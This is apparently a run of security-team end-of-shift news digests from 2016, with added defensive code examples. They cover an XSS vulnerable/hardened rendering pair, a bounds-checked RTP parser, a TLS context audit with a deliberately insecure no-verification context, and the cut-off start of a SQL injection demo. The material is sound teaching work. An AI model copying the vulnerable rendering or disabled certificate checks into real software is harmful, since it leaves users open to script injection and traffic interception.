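        '<td><a href="detail?src=' + href_value + '">' + client_text + "</a></td></tr>"
    )


def reflects_raw(output: str, untrusted: Mapping[str, str]) -> bool:
    """True if any untrusted value that contains markup characters appears
    unchanged in the rendered output, i.e. the page is reflecting it raw."""
    return any(v in output for v in untrusted.values() if any(c in v for c in "<>\"'"))


if __name__ == "__main__":
    print("vulnerable reflects raw input:", reflects_raw(render_vulnerable(SAMPLE_PARAMS, SAMPLE_HEADERS), SAMPLE_HEADERS))
    print("hardened reflects raw input:  ", reflects_raw(render_hardened(SAMPLE_PARAMS, SAMPLE_HEADERS), SAMPLE_HEADERS))
```

The point of the header case is that X-Forwarded-For arrives from the network just as a query string does; only a value written by a proxy you control, after stripping whatever the client sent, deserves any trust, and even then it is displayed, not executed, so it still gets encoded for its output context.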
*** DSA-3541 roundcube - security update ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered that Roundcube, a webmail client, contained a path traversal vulnerability. This flaw could be exploited by an attacker to access sensitive files on the server, or even execute arbitrary code.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3541
*** USN-2945-1: XChat-GNOME vulnerability ***
---------------------------------------------
Ubuntu Security Notice USN-2945-1, 4th April, 2016: xchat-gnome vulnerability
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS
Summary: XChat-GNOME could be made to expose sensitive information over the network.
Software description: xchat-gnome - simple and featureful IRC client for GNOME
Details: It was discovered that XChat-GNOME incorrectly verified the hostname in an SSL certificate. An attacker could trick XChat-GNOME into trusting...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2945-1/
*** USN-2944-1: Libav vulnerabilities ***
---------------------------------------------
Ubuntu Security Notice USN-2944-1, 4th April, 2016: libav vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 12.04 LTS
Summary: Libav could be made to crash or run programs as your login if it opened a specially crafted file.
Software description: libav - Multimedia player, server, encoder and transcoder
Details: It was discovered that Libav incorrectly handled certain malformed media files. If a user were tricked into opening a crafted media file, an attacker could...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2944-1/
*** Bugtraq: [SE-2012-01] Broken security fix in IBM Java 7/8 ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537973
*** Open-Xchange Input Validation Flaws Let Remote Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035469
*** Bugtraq: [security bulletin] HPSBGN03569 rev.1 - HPE OneView for VMware vCenter (OV4VC), Remote Disclosure of Information ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537977
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 01-04-2016 18:00 − Montag 04-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** SideStepper vulnerability in iOS 9 endangers companies that use MDM to distribute apps ***
---------------------------------------------
Researchers are warning companies that the use of MDM technology opens up a loophole in protections added to Apple's iOS 9 to help prevent employees from downloading malicious software posing as legitimate enterprise apps.
---------------------------------------------
http://www.scmagazine.com/sidestepper-vulnerability-in-ios-9-endangers-comp…
*** Analysis of the Locky infection process ***
---------------------------------------------
In recent months, there has been a significant increase in the number of networks and users affected by ransomware known as Locky, which is used to encrypt a victim's files and then demand a ransom to be paid in bitcoins. But, how does this threat manage to infiltrate computer systems and hijack data? From the ESET Research Lab in Latin America, we can explain the steps and the methods used by cybercriminals to evade various layers of security.
---------------------------------------------
http://www.welivesecurity.com/2016/04/04/analysis-of-the-locky-infection-pr…
*** PayPal plugs phishing-enabling vulnerability, stumps up $500 ***
---------------------------------------------
To the bug-splatter who found it. Not to you, don't get excited. PayPal has patched a flaw which created a means for miscreants to abuse its platform to lend authenticity to fraudulent or otherwise malicious emails.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/01/paypal_plug…
*** Steam hacker says more vulnerabilities will be found, but not by him ***
---------------------------------------------
"It looks like their website hasn't been updated for years."
---------------------------------------------
http://arstechnica.com/gaming/2016/04/steam-hacker-says-more-vulnerabilitie…
*** New Heap-Spray Exploit Tied To LZH Archive Decompression ***
---------------------------------------------
Researchers found a vulnerability in the classic compression standard Lhasa, once a mainstay for game developers in the mid-90s and still in use today.
---------------------------------------------
http://threatpost.com/new-heap-spray-exploit-tied-to-lzh-archive-decompress…
*** Magento e-commerce platform targeted with new ransomware KimcilWare ***
---------------------------------------------
Users of the Magento e-commerce platform are being targeted with a new ransomware called KimcilWare.
---------------------------------------------
http://www.scmagazine.com/magento-e-commerce-platform-targeted-with-new-ran…
*** Magnitude EK Malvertising Campaign Adds Fingerprinting Gate ***
---------------------------------------------
Threat actors refine a malvertising campaign leading to Magnitude EK.
---------------------------------------------
https://blog.malwarebytes.org/cybercrime/2016/04/magnitude-ek-malvertising-…
*** Continuous Integration: Jenkins accidentally sends anonymous usage data ***
---------------------------------------------
A bug in Jenkins versions 1.645 and 1.642.2 ignores the setting that controls sending of usage statistics. An update is meant to fix the problem; alternatively, the maintainers give tips for a manual workaround.
---------------------------------------------
http://heise.de/-3161093
*** "Experience is a good school. But the fees are high." ENISA urges decision makers to take action before a major cyber crisis occurs in Europe ***
---------------------------------------------
ENISA analysed the EU-level crisis management frameworks in five different sectors to make recommendations on more efficient cyber crisis cooperation and management. The report resulting from this study highlights the lessons that can be learnt from other sectors and that could be applicable in the cyber domain. The study concludes with a series of recommendations regarding EU-level priorities to alter the impact of potential cyber crises. More recently ENISA published a video related to this study that summarises the conclusions based on testimonials from experts in other sectors.
---------------------------------------------
https://www.enisa.europa.eu/media/press-releases/201cexperience-is-a-good-s…
*** Multiple vulnerabilities found in Quanta LTE routers (backdoor, backdoor accounts, RCE, weak WPS ...) ***
---------------------------------------------
The Quanta LTE QDH Router device is an LTE router / access point that is badly designed overall and has a lot of vulnerabilities. It's available in a number of countries to provide Internet access over an LTE network.
---------------------------------------------
https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilit…
*** Analysis of the Procedure of Penetration on a Hacked Host ***
---------------------------------------------
On the morning of the 14th, a colleague of mine reported that the CPU usage of a host had reached 100%. The Security Department then embarked on an investigation and concluded the following:...
---------------------------------------------
http://en.wooyun.io/2016/03/29/48.html
*** Comparing binaries: BinDiff now (almost) free to use ***
---------------------------------------------
Developers and security researchers can download the binary-diffing tool BinDiff free of charge. Using it, however, requires a paid disassembler.
---------------------------------------------
http://heise.de/-3161798
*** How Reporters Pulled Off the Panama Papers, the Biggest Leak in Whistleblower History ***
---------------------------------------------
The 2.6 terabyte Panama Papers may be the first leak of their scale, but they won't be the last.
---------------------------------------------
http://www.wired.com/2016/04/reporters-pulled-off-panama-papers-biggest-lea…
*** DFN-CERT-2016-0539: Squid: two vulnerabilities allow, among other things, various denial-of-service attacks ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0539/
*** DSA-3539 srtp - security update ***
---------------------------------------------
Randell Jesup and the Firefox team discovered that srtp, Cisco's reference implementation of the Secure Real-time Transport Protocol (SRTP), does not properly handle the RTP header CSRC count and extension header length. A remote attacker can exploit this vulnerability to crash an application linked against libsrtp, resulting in a denial of service.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3539
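The srtp flaw above is a bounds-check problem in header parsing: the CSRC count and the extension length are attacker-controlled fields, and each must be checked against the packet length before it is used to index the buffer. The parser below is an added example, not code from libsrtp or from the Debian advisory; it follows the RFC 3550 header layout and rejects any packet whose declared lengths exceed the buffer. The packets in the usage are constructed samples.

```python
import struct

RTP_FIXED_HEADER_LEN = 12  # V/P/X/CC, M/PT, sequence, timestamp, SSRC (RFC 3550 5.1)


class RtpParseError(ValueError):
    """Raised for any packet whose declared lengths do not fit in the buffer."""


def parse_rtp_header(pkt):
    """Parse an RTP packet into its header fields and payload.

    Every length the packet declares (CSRC count, extension length, padding
    length) is checked against what is actually in the buffer before it is
    used to slice; an unchecked read here is the class of bug in the advisory.
    """
    if len(pkt) < RTP_FIXED_HEADER_LEN:
        raise RtpParseError("packet shorter than the 12-byte fixed header")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:RTP_FIXED_HEADER_LEN])
    if b0 >> 6 != 2:
        raise RtpParseError("unsupported RTP version %d" % (b0 >> 6))
    has_padding = bool(b0 & 0x20)
    has_extension = bool(b0 & 0x10)
    cc = b0 & 0x0F
    offset = RTP_FIXED_HEADER_LEN

    # Check 1: CSRC list. cc is a 4-bit field, so it can claim up to 60 bytes.
    csrc_end = offset + 4 * cc
    if csrc_end > len(pkt):
        raise RtpParseError("CSRC count %d needs %d bytes, %d available"
                            % (cc, 4 * cc, len(pkt) - offset))
    csrcs = list(struct.unpack("!%dI" % cc, pkt[offset:csrc_end]))
    offset = csrc_end

    # Checks 2 and 3: the extension header itself, then the length it declares
    # (a 16-bit count of 32-bit words, so up to 262140 bytes).
    extension = None
    if has_extension:
        if offset + 4 > len(pkt):
            raise RtpParseError("extension bit set but no room for the extension header")
        profile, ext_words = struct.unpack("!HH", pkt[offset:offset + 4])
        ext_end = offset + 4 + 4 * ext_words
        if ext_end > len(pkt):
            raise RtpParseError("extension length %d words exceeds packet" % ext_words)
        extension = (profile, pkt[offset + 4:ext_end])
        offset = ext_end

    payload = pkt[offset:]
    # Check 4: padding. The last octet says how many trailing bytes to drop.
    if has_padding:
        if not payload or payload[-1] == 0 or payload[-1] > len(payload):
            raise RtpParseError("invalid padding length")
        payload = payload[:-payload[-1]]

    return {
        "marker": bool(b1 & 0x80), "payload_type": b1 & 0x7F,
        "seq": seq, "timestamp": ts, "ssrc": ssrc,
        "csrcs": csrcs, "extension": extension, "payload": payload,
    }


def is_well_formed(pkt):
    """True if parse_rtp_header accepts the packet, False if it rejects it."""
    try:
        parse_rtp_header(pkt)
        return True
    except RtpParseError:
        return False


def build_rtp_packet(payload_type, seq, ts, ssrc, payload, csrcs=(), extension=None):
    """Build a well-formed packet (used only to construct the samples below)."""
    b0 = (2 << 6) | (0x10 if extension is not None else 0) | len(csrcs)
    out = struct.pack("!BBHII", b0, payload_type & 0x7F, seq, ts, ssrc)
    out += struct.pack("!%dI" % len(csrcs), *csrcs)
    if extension is not None:
        profile, data = extension
        out += struct.pack("!HH", profile, len(data) // 4) + data
    return out + payload


if __name__ == "__main__":
    # Constructed samples: a valid packet, a 12-byte packet claiming 15 CSRCs,
    # and a packet whose extension claims 0xFFFF words of data.
    good = build_rtp_packet(0, 1, 160, 0xDEADBEEF, b"\x00" * 8,
                            csrcs=(1, 2), extension=(0xBEDE, b"\x01\x02\x03\x04"))
    print(parse_rtp_header(good))
    print(is_well_formed(bytes([0x8F, 0, 0, 1]) + b"\x00" * 8))
    print(is_well_formed(bytes([0x90, 0, 0, 1]) + b"\x00" * 8 + b"\xbe\xde\xff\xff"))
```

The two malformed samples are the two fields named in the advisory: a CSRC count that promises more 32-bit words than the packet holds, and an extension length that does the same. A parser that slices first and checks afterwards reads past the buffer in both cases.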
*** DSA-3540 lhasa - security update ***
---------------------------------------------
Marcin Noga discovered an integer underflow in Lhasa, an lzh archive decompressor, which might result in the execution of arbitrary code if a malformed archive is processed.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3540
*** Bugtraq: FortiManager & FortiAnalyzer 5.x (Appliance Application) - (filename) Persistent Web Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537967
*** Bugtraq: ManageEngine Password Manager Pro Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537969
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 31-03-2016 18:00 − Friday 01-04-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** ICONICS WebHMI Directory Traversal Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a directory traversal vulnerability in the ICONICS WebHMI V9 application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-091-01
*** Beware of Unverified TLS Certificates in PHP & Python ***
---------------------------------------------
Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN's cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn't verify the TLS certificate, a ...
---------------------------------------------
https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-pyth…
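For the Python side of the Sucuri post, the check a practitioner wants is whether the client's SSL context actually validates the certificate chain and the hostname. The block below is an added example, not code from the post: it builds the two contexts and a small audit that flags the settings the post warns about. It uses only the standard library and opens no network connection.

```python
import ssl


def secure_client_context(cafile=None):
    """The configuration to use for third-party APIs: chain validation against
    the system trust store (or `cafile`), hostname check, nothing below TLS 1.2.
    create_default_context() already turns on the first two; the version floor
    is set explicitly so the audit below holds on older Pythons too."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def insecure_client_context():
    """What 'verify=False' amounts to: any certificate is accepted, so an
    on-path attacker with a self-signed certificate can read and rewrite the
    API traffic. Note the order: setting CERT_NONE while check_hostname is
    still True raises ValueError, which is why disabling verification always
    takes these two lines."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx):
    """Return a list of findings for an SSLContext; an empty list means the
    context is safe to use for talking to an API server."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: the server certificate "
                        "chain is never validated")
    if not ctx.check_hostname:
        findings.append("check_hostname is False: a certificate valid for any other "
                        "name would be accepted for this host")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version is below TLS 1.2")
    return findings


if __name__ == "__main__":
    print("secure:  ", audit_context(secure_client_context()))
    print("insecure:", audit_context(insecure_client_context()))
```

The same audit applies to the higher-level libraries: `urllib.request.urlopen` and `requests` verify by default, and passing `verify=False` (or a context from `ssl._create_unverified_context()`) lands you in the second configuration. In PHP's cURL binding the two knobs are `CURLOPT_SSL_VERIFYPEER` (chain) and `CURLOPT_SSL_VERIFYHOST` (hostname, which must be 2); setting either to false or 0 has the same effect.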
*** TA16-091A: Ransomware and Recent Variants ***
---------------------------------------------
In early 2016, destructive ransomware variants such as Locky and Samas were observed infecting computers belonging to individuals and businesses, which included healthcare facilities and hospitals worldwide. Ransomware is a type of malicious software that infects a computer and restricts users' access to it until a ransom is paid to unlock it.
---------------------------------------------
https://www.us-cert.gov/ncas/alerts/TA16-091A
*** How To Build Your Own Rogue GSM BTS For Fun And Profit ***
---------------------------------------------
In this blog post I'm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking ... yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what governments have been using for years to perform GSM interception.
---------------------------------------------
https://evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-f…
*** About the security content of iBooks Author 2.4.1 ***
---------------------------------------------
Available for: OS X Yosemite v10.10 or later Impact: Parsing a maliciously crafted iBooks Author file may lead to disclosure of user information Description: An XML external entity reference issue existed with iBook Author parsing. This issue was addressed through improved parsing. CVE-ID CVE-2016-1789
---------------------------------------------
https://support.apple.com/en-us/HT206224
*** Security: Apple's Rootless concept has significant flaws ***
---------------------------------------------
Apple's Rootless security mechanism is meant to prevent system files from being modified even with root privileges. But it can easily be tricked, and Apple seems to be in no hurry to close the holes.
---------------------------------------------
http://www.golem.de/news/security-apples-rootless-konzept-hat-erhebliche-ma…
*** WebKitGTK+ Security Advisory WSA-2016-0003 ***
---------------------------------------------
Several vulnerabilities were discovered in WebKitGTK+.
CVE identifiers: CVE-2016-1778, CVE-2016-1779, CVE-2016-1781, CVE-2016-1782, CVE-2016-1783, CVE-2016-1785, CVE-2016-1786.
---------------------------------------------
http://webkitgtk.org/security/WSA-2016-0003.html
*** DFN-CERT-2016-0530 - PostgreSQL: Two vulnerabilities allow, among other things, disclosure of information ***
---------------------------------------------
Two vulnerabilities in PostgreSQL allow a remote, simply authenticated attacker to disclose information, carry out denial-of-service attacks and bypass security measures, and as a consequence manipulate data.
The PostgreSQL Global Development Group provides a security update to version 9.5.2 to fix the vulnerabilities.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0530/
*** New Ransomware KimcilWare Targets Magento Websites ***
---------------------------------------------
Ransomware dubbed KimcilWare is targeting websites running the e-commerce platform Magento and encrypting website files.
---------------------------------------------
http://threatpost.com/new-ransomware-kimcilware-targets-magento-websites/11…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 30-03-2016 18:00 − Thursday 31-03-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Google, too, should unlock smartphones for US authorities ***
---------------------------------------------
The current dispute over the locked smartphones of suspected criminals revolves entirely around Apple and the FBI, but US authorities have also sent Google numerous such requests. That is what the civil liberties organisation ACLU has found.
---------------------------------------------
http://www.golem.de/news/nicht-nur-apple-auch-google-sollte-fuer-us-behoerd…
*** Vulnerability in SAP software: hundreds of thousands of companies at risk ***
---------------------------------------------
German authorities rate the flaws as "critical"; they have only been fixed since October
---------------------------------------------
http://derstandard.at/2000033938536
*** Trend Micro products opened a trivial backdoor ***
---------------------------------------------
Antivirus software is supposed to protect the system from malicious software. Increasingly, however, it turns out that it can itself serve as an entry point. A security expert demonstrates this once again with Trend Micro's security products.
---------------------------------------------
http://heise.de/-3159436
*** Automated medication dispensers with over 1,400 vulnerabilities ***
---------------------------------------------
Outdated SupplyStation systems are still in use in hospitals and have thousands of vulnerabilities. The US ICS-CERT is therefore warning about the security risk posed by these medication dispensers.
---------------------------------------------
http://heise.de/-3159439
*** Snort Covert Channels ***
---------------------------------------------
Lab 3: Covert Channels. Covert channels are used by outside attackers to establish communications with the compromised system, or by malicious insiders to secretly transfer data to unauthorized locations. There are various implementations ..
---------------------------------------------
http://resources.infosecinstitute.com/snort-covert-channels/
*** Security best practices for git users ***
---------------------------------------------
In recent years git has become one of the most popular SCM/version control systems. Usage in some high-profile open-source projects like Linux or Raspberry Pi and support from vendors like GitHub and GitLab definitely helped it gain popularity. As ..
---------------------------------------------
http://resources.infosecinstitute.com/security-best-practices-for-git-users/
*** PowerWare 'Fileless Infection' Deepens Ransomware Conundrum for Healthcare Providers ***
---------------------------------------------
The recent wave of ransomware attacks on healthcare institutions is not only raising questions about contingency planning, but also about whether healthcare is becoming the 'go-to' target for cyber extortionists looking to make quick ..
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/powerware-fileless-inf…
*** DFN-CERT PGP keys ***
---------------------------------------------
https://www.dfn-cert.de/aktuell/dfn-cert-schluessel.html
*** Cisco Firepower Malware Block Bypass Vulnerability ***
---------------------------------------------
A vulnerability in the malicious file detection and blocking features of Cisco Firepower System Software could allow an unauthenticated, remote attacker to bypass malware detection mechanisms on an affected system.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
*** Let Me Get That Door for You: Remote Root Vulnerability in HID Door Controllers ***
---------------------------------------------
If you've ever been inside an airport, university campus, hospital, government complex, or office building, you've probably seen one of HID's brand of card readers standing guard over a restricted area. HID is one of the world's largest ..
---------------------------------------------
http://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-…
*** The Linux Remaiten malware is building a Botnet of IoT devices ***
---------------------------------------------
Experts from the ESET firm have spotted a new threat in the wild dubbed Remaiten that targets embedded systems to recruit them in a botnet. ESET is actively monitoring malicious codes that target IoT systems such as routers, gateways ..
---------------------------------------------
http://securityaffairs.co/wordpress/45820/iot/linux-remaiten-iot-botnet.html
*** Ransomware Petya - a technical review ***
---------------------------------------------
On March 24, researchers at G DATA received a sample of a new type of ransomware which was dubbed 'Petya'. Unlike other types of ransomware, Petya prevents the operating system from starting by manipulating the MBR and installing its own ..
---------------------------------------------
https://blog.gdatasoftware.com/2016/03/28226-ransomware-petya-a-technical-r…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 29-03-2016 18:00 − Wednesday 30-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** CareFusion Pyxis SupplyStation System Vulnerabilities ***
---------------------------------------------
This medical advisory contains mitigation details for numerous third-party software vulnerabilities in end-of-life versions of CareFusion's Pyxis SupplyStation system.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-16-089-01
*** Websites Hacked Redirect to Porn from PDF / DOC Links ***
---------------------------------------------
We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking and SEO poisoning. This time we'll tell you about yet another interesting blackhat SEO attack that we've been watching for the last year. Let's begin with ..
---------------------------------------------
https://blog.sucuri.net/2016/03/pdf-doc-urls-redirect-to-porn.html
*** CloudFlare <= 1.3.20 - Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8428
*** The Topology of Malicious Activity on IPv4 ***
---------------------------------------------
There has been a great deal of academic and industry focus on identifying malicious activity across autonomous systems, and for good reasons. Over 50% of 'good' Internet traffic comes from large, ocean-like ASes pushing content from companies like Netflix, Google, Facebook, Apple and Amazon. However, ..
---------------------------------------------
http://www.suchin.co/2016/03/23/Topology-Of-Malicious-Activity/
*** Operating system: OpenBSD 5.9 filters system calls extensively ***
---------------------------------------------
The functionality for filtering and restricting system calls has been extended to many more applications in OpenBSD 5.9. The system also supports newer laptops better, thanks to UEFI and 802.11n WLAN.
---------------------------------------------
http://www.golem.de/news/betriebssystem-openbsd-5-9-filtert-weitgehend-syst…
*** Scammers Impersonate ISPs in New Tech Support Campaign ***
---------------------------------------------
Scammers devise a new ploy to trick users into thinking their own ISP is warning them about malware.
---------------------------------------------
https://blog.malwarebytes.org/threat-analysis/2016/03/scammers-impersonate-…
*** [HTB23298]: Multiple Vulnerabilities in CubeCart ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users.
---------------------------------------------
https://www.htbridge.com/advisory/HTB23298
*** System Integrity Protection: Apple's root-free zone is not so root-free after all ***
---------------------------------------------
With El Capitan, Apple wants to prevent bad guys with root privileges from wrecking the system. Unfortunately, the security concept, also known as Rootless, has many holes and therefore does not fully work at the moment.
---------------------------------------------
http://heise.de/-3157130
*** The darling of all cyber-criminals: Flash ***
---------------------------------------------
Among the top 15 most exploited vulnerabilities are 13 in Flash alone, report the antivirus experts at the Finnish company F-Secure.
---------------------------------------------
http://heise.de/-3157553
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 25-03-2016 18:00 − Tuesday 29-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** German hosters increasingly in the focus of cyber-criminals ***
---------------------------------------------
Cyber-criminals are making ever greater use of the technically advanced Internet infrastructure of the first world. German hosters are becoming increasingly popular with them for distributing their malware.
---------------------------------------------
http://heise.de/-3151832
*** Basic Snort Rules Syntax and Usage ***
---------------------------------------------
In this series of lab exercises we will demonstrate various techniques in writing Snort rules, from basic rules syntax to writing rules aimed at detecting specific types of attacks. We will also examine some basic approaches ..
---------------------------------------------
http://resources.infosecinstitute.com/snort-rules-workshop-part-one/
*** TWSL2016-006: Multiple XSS Vulnerabilities reported for Zen Cart ***
---------------------------------------------
Today Trustwave released a vulnerability advisory in conjunction with Zen Cart. Researchers from the SpiderLabs Research team at Trustwave recently found multiple Cross-Site Scripting (XSS) vulnerabilities in the popular online open source shopping ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/TWSL2016-006--Multiple-…
*** CVE-2016-1010 (??? - Flash up to 20.0.0.306) and Exploit Kits ***
---------------------------------------------
http://malware.dontneedcoffee.com/2016/03/flash-up-to-2000306.html
*** New infection method: ransomware abuses Windows PowerShell ***
---------------------------------------------
The newly discovered ransomware PowerWare hijacks Windows PowerShell to infect computers and encrypt data.
---------------------------------------------
http://heise.de/-3151892
*** Every Tool in the Tool Box ***
---------------------------------------------
When I teach people about reverse engineering, I often hear the following statement: "I got the right answer, but I cheated to get it". They are typically talking about using dynamic analysis to get an answer versus statically analyzing ..
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/Every-Tool-in-the-Tool-Box/
*** DSA-3532 quagga - security update ***
---------------------------------------------
Kostya Kortchinsky discovered a stack-based buffer overflow vulnerability in the VPNv4 NLRI parser in bgpd in quagga, a BGP/OSPF/RIP routing daemon. A remote attacker can exploit this flaw to cause a denial of service (daemon crash), or potentially, execution of arbitrary code, if bgpd is configured with BGP peers enabled for VPNv4.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3532
*** Improving Bash Forensics Capabilities ***
---------------------------------------------
Bash is the default user shell in most Linux distributions. In case of incidents affecting a UNIX server, there is a good chance that a Bash shell will be ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20887
*** Life After the Isolated Heap ***
---------------------------------------------
Over the past few months, Adobe has introduced a number of changes to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs ..
---------------------------------------------
http://googleprojectzero.blogspot.com/2016/03/life-after-isolated-heap.html
*** APPLE-SA-2016-03-28-1 OS X: Flash Player plug-in blocked ***
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Mar/msg00007.ht…
*** DSA-3533 openvswitch - security update ***
---------------------------------------------
Kashyap Thimmaraju and Bhargava Shastry discovered a remotely triggerable buffer overflow vulnerability in openvswitch, a production quality, multilayer virtual switch implementation. Specially crafted MPLS packets could overflow ..
---------------------------------------------
https://www.debian.org/security/2016/dsa-3533
*** "Collecting Serial Data for ICS Network Security Monitoring" ***
---------------------------------------------
Below is a post by SANS ICS515 - ICS Active Defense and Incident Response instructor Mark Bristow. Adversaries across the capability spectrum are increasingly targeting Industrial Control System (ICS) environments. Malware such as ..
---------------------------------------------
http://ics.sans.org/blog/2016/03/29/collecting-serial-data-for-ics-network-…
*** Why PCI DSS cannot replace common sense and holistic risk assessment ***
---------------------------------------------
Cybersecurity compliance is not designed to eliminate data breaches or stop cybercrime.
---------------------------------------------
https://www.htbridge.com/blog/why-pci-dss-cannot-replace-common-sense-and-h…
*** Printers all over the US 'hacked' to spew anti-Semitic fliers ***
---------------------------------------------
Andrew 'Weev' Auernheimer, one of the two men who were prosecuted and convicted for harvesting e-mails and authentication IDs of 114,000 early-adopters of Apple's iPad from AT&T's ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/29/printers-us-hacked-anti-semitic-…
*** Xen Security Advisory 172 (CVE-2016-3158, CVE-2016-3159) - broken AMD FPU FIP/FDP/FOP leak workaround ***
---------------------------------------------
There is a workaround in Xen to deal with the fact that AMD CPUs don't load the x86 registers FIP (and possibly FCS), FDP (and possibly FDS), and FOP from memory (via XRSTOR or FXRSTOR) when there is no pending unmasked exception. (See XSA-52.) However, this workaround does not cover all possible input cases.
---------------------------------------------
http://lists.xen.org/archives/html/xen-announce/2016-03/msg00001.html
*** Google developer: NPM malware could spread as a worm ***
---------------------------------------------
Because of some design principles of the Node package manager NPM, a malicious module could spread like a worm through the whole system, warns a Google developer. For now, only manual work helps against the security hole.
---------------------------------------------
http://www.golem.de/news/google-entwickler-npm-malware-koennte-sich-als-wur…
*** Petya: stop the ransomware before it encrypts the hard drives ***
---------------------------------------------
The Petya ransomware targets German-speaking victims and makes their computers unable to boot. The trojan also encrypts the hard drives, but this can be prevented if it is stopped in time.
---------------------------------------------
http://heise.de/-3153388
*** Vulnerability in popular caller-ID app Truecaller exposes user data ***
---------------------------------------------
http://derstandard.at/2000033814462
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 24-03-2016 18:00 − Friday 25-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** DFN-CERT-2016-0510: Xen, QEMU: Multiple vulnerabilities allow, among other things, execution of arbitrary code with the privileges of the service ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0510/
*** USB Trojan Hides In Portable Applications, Targets Air-Gapped Systems ***
---------------------------------------------
A Trojan program, dubbed USB Thief by researchers at security firm ESET, infects USB drives that contain portable installations of popular applications such as Firefox, NotePad++, or TrueCrypt, and it also seems to be designed to steal information from so-called air-gapped computers. "In the case we ..
---------------------------------------------
https://it.slashdot.org/story/16/03/24/184255/usb-trojan-hides-in-portable-…
*** F5: sol93122894: OpenSSL vulnerability CVE-2016-0705 ***
---------------------------------------------
OpenSSL handling of malformed DSA private keys may cause memory corruption and possibly stop the handling process.
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/93/sol93122894.html
*** Tenable: [R1] Log Correlation Engine (LCE) 4.8.0 Updates Libxml2 ***
---------------------------------------------
The Log Correlation Engine (LCE) uses the third-party Libxml2 library for some XML parsing routines. A vulnerability was found and patched in Libxml2 recently. Tenable has not evaluated this vulnerability beyond acknowledging that user-supplied XML ..
---------------------------------------------
http://www.tenable.com/security/tns-2016-06
*** Cogent DataHub Elevation of Privilege Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a privilege elevation vulnerability in the Cogent DataHub application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
*** SQL Injection Cheat Sheet ***
---------------------------------------------
What is an SQL Injection Cheat Sheet? An SQL injection cheat sheet is a resource in which you can find detailed technical information about the many different variants of the SQL Injection vulnerability. This cheat sheet is of good ..
---------------------------------------------
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
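An added example, not taken from the Netsparker cheat sheet: the login query that the cheat sheet's payload families target, built by string concatenation, beside the parameterised form, both run against an in-memory SQLite database with constructed rows. It shows a comment-based authentication bypass, a tautology, and UNION-based extraction of every password in the table; none of the three has any effect on the parameterised version.

```python
import sqlite3


def make_db():
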